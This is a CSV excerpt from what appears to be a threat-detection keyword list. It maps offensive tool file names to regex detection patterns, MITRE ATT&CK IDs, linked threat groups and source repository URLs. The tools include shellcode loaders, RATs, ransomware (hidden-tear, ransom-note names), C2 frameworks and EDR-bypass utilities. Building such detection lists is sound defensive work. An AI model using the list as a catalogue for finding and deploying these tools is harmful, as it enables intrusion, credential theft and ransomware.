"*\hades.exe*",".{0,1000}\\hades\.exe.{0,1000}","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/f1zm0/hades","1","0","N/A","N/A","N/A","4","364","47","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z","15765"
"*\hades-main.zip*",".{0,1000}\\hades\-main\.zip.{0,1000}","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/f1zm0/hades","1","0","N/A","N/A","N/A","4","364","47","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z","15766"
"*\HAKOPS B?nder.exe*",".{0,1000}\\HAKOPS\sB\?nder\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","15767"
"*\HAKOPS RAT.exe*",".{0,1000}\\HAKOPS\sRAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","15768"
"*\HandleHijacker.cpp*",".{0,1000}\\HandleHijacker\.cpp.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","0","N/A","N/A","9","10","1088","143","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z","15769"
"*\HandleHijacker.hpp*",".{0,1000}\\HandleHijacker\.hpp.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","0","N/A","N/A","9","10","1088","143","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z","15770"
"*\handlekatz.exe*",".{0,1000}\\handlekatz\.exe.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","15771"
"*\handlekatz.py*",".{0,1000}\\handlekatz\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","15772"
"*\Harmmy Rat v1.*.exe*",".{0,1000}\\Harmmy\sRat\sv1\..{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","15773"
"*\harvest.cmb*",".{0,1000}\\harvest\.cmb.{0,1000}","offensive_tool_keyword","combine_harvester","Rust in-memory dumper","T1055 - T1055.001 - T1055.012","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/m3f157O/combine_harvester","1","0","N/A","N/A","10","2","108","17","2023-07-26T07:16:00Z","2023-07-20T07:37:51Z","15774"
"*\harvester64.o*",".{0,1000}\\harvester64\.o.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","15775"
"*\harvester86.o*",".{0,1000}\\harvester86\.o.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","15776"
"*\hash_spider.py*",".{0,1000}\\hash_spider\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","15777"
"*\hashview.py*",".{0,1000}\\hashview\.py.{0,1000}","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","0","N/A","N/A","10","4","373","41","2025-02-20T18:23:25Z","2020-11-23T19:21:06Z","15778"
"*\HavRat.exe*",".{0,1000}\\HavRat\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","15779"
"*\HellsHall.c*",".{0,1000}\\HellsHall\.c.{0,1000}","offensive_tool_keyword","HellsHall","Performing Indirect Clean Syscalls","T1106","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Maldev-Academy/HellHall","1","0","N/A","N/A","8","6","535","71","2023-04-19T06:10:47Z","2023-01-03T04:43:05Z","15780"
"*\HellsHall.exe*",".{0,1000}\\HellsHall\.exe.{0,1000}","offensive_tool_keyword","HellsHall","Performing Indirect Clean Syscalls","T1106","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Maldev-Academy/HellHall","1","0","N/A","N/A","8","6","535","71","2023-04-19T06:10:47Z","2023-01-03T04:43:05Z","15781"
"*\HellsHall.h*",".{0,1000}\\HellsHall\.h.{0,1000}","offensive_tool_keyword","HellsHall","Performing Indirect Clean Syscalls","T1106","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Maldev-Academy/HellHall","1","0","N/A","N/A","8","6","535","71","2023-04-19T06:10:47Z","2023-01-03T04:43:05Z","15782"
"*\HELP_SECURITY_EVENT.html*",".{0,1000}\\HELP_SECURITY_EVENT\.html.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","15783"
"*\heroinn_client\*",".{0,1000}\\heroinn_client\\.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1059 - T1547 - T1068 - T1562 - T1110 - T1083 - T1021 - T1071","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","0","N/A","N/A","10","10","672","215","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z","15784"
"*\hidden_tear.Form1.resources*",".{0,1000}\\hidden_tear\.Form1\.resources.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","N/A","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","15785"
"*\hidden-cmd.bat*",".{0,1000}\\hidden\-cmd\.bat.{0,1000}","offensive_tool_keyword","Dispossessor","script used to install anydesk by the Dispossessor group","T1486 - T1490 - T1059 - T1213 - T1078","TA0040 - TA0043 - TA0001 - TA0009","N/A","Dispossessor","Persistence","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","15786"
"*\HiddenDesktop.h*",".{0,1000}\\HiddenDesktop\.h.{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","0","N/A","N/A","10","5","445","133","2025-03-27T21:20:10Z","2021-09-03T17:34:44Z","15787"
"*\HiddenDesktop\*",".{0,1000}\\HiddenDesktop\\.{0,1000}","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/WKL-Sec/HiddenDesktop","1","0","N/A","N/A","10","10","1213","187","2023-12-07T17:15:48Z","2023-05-21T00:57:43Z","15788"
"*\hidden-tear.csproj*",".{0,1000}\\hidden\-tear\.csproj.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","N/A","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","15789"
"*\hidden-tear.exe*",".{0,1000}\\hidden\-tear\.exe.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","N/A","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","15790"
"*\hidden-tear.pdb*",".{0,1000}\\hidden\-tear\.pdb.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","N/A","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","15791"
"*\hidden-tear.sln*",".{0,1000}\\hidden\-tear\.sln.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","N/A","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","15792"
"*\hidden-tear.vshost.exe*",".{0,1000}\\hidden\-tear\.vshost\.exe.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","N/A","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","15793"
"*\HiddenTear.zip*",".{0,1000}\\HiddenTear\.zip.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","N/A","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","15794"
"*\hidden-tear-remake\*",".{0,1000}\\hidden\-tear\-remake\\.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","N/A","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","15795"
"*\HijackablePaths.cs*",".{0,1000}\\HijackablePaths\.cs.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","15796"
"*\HijackDLL-CreateRemoteThread.*",".{0,1000}\\HijackDLL\-CreateRemoteThread\..{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","N/A","7","4","303","47","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z","15797"
"*\HijackDLL-CreateRemoteThread\*",".{0,1000}\\HijackDLL\-CreateRemoteThread\\.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","N/A","7","4","303","47","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z","15798"
"*\HijackDll-Process.*",".{0,1000}\\HijackDll\-Process\..{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","N/A","7","4","303","47","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z","15799"
"*\HijackDLL-Threads.*",".{0,1000}\\HijackDLL\-Threads\..{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","N/A","7","4","303","47","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z","15800"
"*\hijacker_app\src\ProxyApp.exe*",".{0,1000}\\hijacker_app\\src\\ProxyApp\.exe.{0,1000}","offensive_tool_keyword","persistence_demos","Demos of various (also non standard) persistence methods used by malware","T1546 - T1547 - T1133 - T1053 - T1037","TA0003 ","N/A","N/A","Persistence","https://github.com/hasherezade/persistence_demos","1","0","N/A","N/A","7","3","221","47","2023-03-05T17:01:14Z","2017-05-16T09:08:47Z","15801"
"*\hijackers\*",".{0,1000}\\hijackers\\.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","15802"
"*\HijackHunter\*",".{0,1000}\\HijackHunter\\.{0,1000}","offensive_tool_keyword","HijackHunter","Parses a target's PE header in order to find lined DLLs vulnerable to hijacking. Provides reasoning and abuse techniques for each detected hijack opportunity","T1574.002 - T1059.003 - T1078.004","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/matterpreter/OffensiveCSharp/tree/master/HijackHunter","1","0","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","15803"
"*\hiphp-cli.sh*",".{0,1000}\\hiphp\-cli\.sh.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","0","N/A","N/A","10","10","217","33","2025-04-19T07:05:12Z","2021-04-05T20:29:57Z","15804"
"*\hiphp-desktop.sh*",".{0,1000}\\hiphp\-desktop\.sh.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","0","N/A","N/A","10","10","217","33","2025-04-19T07:05:12Z","2021-04-05T20:29:57Z","15805"
"*\HiveDump.ps1*",".{0,1000}\s\\HiveDump\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#registry","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","15806"
"*\hoaxshell\*.py*",".{0,1000}\\hoaxshell\\.{0,1000}\.py.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021  -  T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","0","#linux","N/A","10","10","3992","642","2025-01-19T18:37:12Z","2022-10-25T22:02:59Z","15807"
"*\HookChain.vcxproj*",".{0,1000}\\HookChain\.vcxproj.{0,1000}","offensive_tool_keyword","hookchain","Bypassing EDR Solutions","T1055.011 - T1564.001 - T1070.004 - T1562.001 - T1222","TA0005","N/A","N/A","Defense Evasion","https://github.com/helviojunior/hookchain","1","0","N/A","N/A","9","6","513","85","2025-01-05T22:00:17Z","2024-03-22T13:18:02Z","15808"
"*\hookchain_finder64.c*",".{0,1000}\\hookchain_finder64\.c.{0,1000}","offensive_tool_keyword","hookchain","Bypassing EDR Solutions","T1055.011 - T1564.001 - T1070.004 - T1562.001 - T1222","TA0005","N/A","N/A","Defense Evasion","https://github.com/helviojunior/hookchain","1","0","N/A","N/A","9","6","513","85","2025-01-05T22:00:17Z","2024-03-22T13:18:02Z","15809"
"*\hookchain_finder64.exe*",".{0,1000}\\hookchain_finder64\.exe.{0,1000}","offensive_tool_keyword","hookchain","Bypassing EDR Solutions","T1055.011 - T1564.001 - T1070.004 - T1562.001 - T1222","TA0005","N/A","N/A","Defense Evasion","https://github.com/helviojunior/hookchain","1","0","N/A","N/A","9","6","513","85","2025-01-05T22:00:17Z","2024-03-22T13:18:02Z","15810"
"*\HookChain_msg.exe*",".{0,1000}\\HookChain_msg\.exe.{0,1000}","offensive_tool_keyword","hookchain","Bypassing EDR Solutions","T1055.011 - T1564.001 - T1070.004 - T1562.001 - T1222","TA0005","N/A","N/A","Defense Evasion","https://github.com/helviojunior/hookchain","1","0","N/A","N/A","9","6","513","85","2025-01-05T22:00:17Z","2024-03-22T13:18:02Z","15811"
"*\HookChain_msg.sln*",".{0,1000}\\HookChain_msg\.sln.{0,1000}","offensive_tool_keyword","hookchain","Bypassing EDR Solutions","T1055.011 - T1564.001 - T1070.004 - T1562.001 - T1222","TA0005","N/A","N/A","Defense Evasion","https://github.com/helviojunior/hookchain","1","0","N/A","N/A","9","6","513","85","2025-01-05T22:00:17Z","2024-03-22T13:18:02Z","15812"
"*\HookDetector.csproj*",".{0,1000}\\HookDetector\.csproj.{0,1000}","offensive_tool_keyword","HookDetector","Detects hooked Native API functions in the current process indicating the presence of EDR","T1055.012 - T1082 - T1057","TA0007 - TA0003","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/HookDetector","1","0","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","15813"
"*\HookDetector.exe*",".{0,1000}\\HookDetector\.exe.{0,1000}","offensive_tool_keyword","HookDetector","Detects hooked Native API functions in the current process indicating the presence of EDR","T1055.012 - T1082 - T1057","TA0007 - TA0003","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/HookDetector","1","0","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","15814"
"*\HostEnum.ps1*",".{0,1000}\\HostEnum\.ps1.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script function and alias to perform some rudimentary Windows host enumeration with Beacon built-in commands","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/red-team-scripts","1","0","N/A","N/A","10","10","1122","195","2024-11-19T19:39:01Z","2017-05-01T13:53:05Z","15816"
"*\HostEnum.ps1*",".{0,1000}\\HostEnum\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","15817"
"*\HostRecon.ps1*",".{0,1000}\\HostRecon\.ps1.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","15818"
"*\Hotkeyz.exe*",".{0,1000}\\Hotkeyz\.exe.{0,1000}","offensive_tool_keyword","hotkeyz","Hotkey-based keylogger for Windows","T1056.001","TA0006  - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/yo-yo-yo-jbo/hotkeyz","1","0","N/A","N/A","9","1","21","1","2024-10-17T17:50:19Z","2024-06-03T21:23:16Z","15819"
"*\HOW TO RECOVER YOUR FILES.TXT*",".{0,1000}\\HOW\sTO\sRECOVER\sYOUR\sFILES\.TXT.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","15820"
"*\HOW TO RECOVERY FILES.TXT*",".{0,1000}\\HOW\sTO\sRECOVERY\sFILES\.TXT.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","15821"
"*\How to Restore Your Files.html*",".{0,1000}\\How\sto\sRestore\sYour\sFiles\.html.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","15822"
"*\How To Restore Your Files.txt*",".{0,1000}\\How\sTo\sRestore\sYour\sFiles\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","15823"
"*\HOW_RETURN_YOUR_DATA.TXT*",".{0,1000}\\HOW_RETURN_YOUR_DATA\.TXT.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","15824"
